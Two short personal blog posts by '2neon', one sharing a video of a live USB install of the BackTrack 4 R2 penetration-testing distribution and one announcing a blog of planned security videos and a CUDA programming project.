This is a live install, which means if you make ANY changes, once you reboot they will be lost.

For those who don't know what BackTrack is, it's a custom Linux distribution built for penetration testing, exploitation and so on.
Found here http://www.backtrack-linux.org/

Please enjoy the video linked below any feedback would be fantastic and very useful.

Live install of BT4R2 to USB

Thanks
2neon

P.S. Thanks to my friend Heliocentric who is providing the tunes.

2neon has a blog

So I have decided to create a blog.

The idea behind the blog is to keep people updated on security vids and my program development.

As all of this is kind of new to me it may be a little tedious to start with, so bear with me.

So, the videos are going to be using a backtrack virtual box and then a victim machine/virtual box.
This part I am familiar with, the recording will be using camtasia, which is something to look forward to :(

Finally I am trying to develop a program using the CUDA architecture, more on this later!

Cheers
2neon